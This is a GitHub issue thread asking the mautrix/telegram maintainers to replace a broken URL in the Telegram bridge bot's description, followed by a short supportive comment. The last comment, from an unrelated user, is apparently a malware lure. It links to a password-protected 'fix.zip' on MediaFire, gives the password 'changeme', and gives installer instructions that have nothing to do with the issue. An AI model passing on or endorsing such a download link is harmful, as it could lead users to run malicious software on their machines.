### ISSUE TITLE
Fix URL rot in Telegram bot description

### ISSUE THREAD

**Issue by valerio-bozzolan** [mautrix/telegram#972]
Hello :)

Please visit the Telegram bot father to improve this description:

https://t.me/matrix_t2bot

Current:

> A Telegram bridge for Matrix. See https://telegram.t2bot.io for details

Proposed:

> A Telegram bridge for Matrix. See https://t2bot.io/telegram/ for details

Reason:

The old URL is broken :)

**Comment by valerio-bozzolan** [comment]
I hope this will increase contributors and donations

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
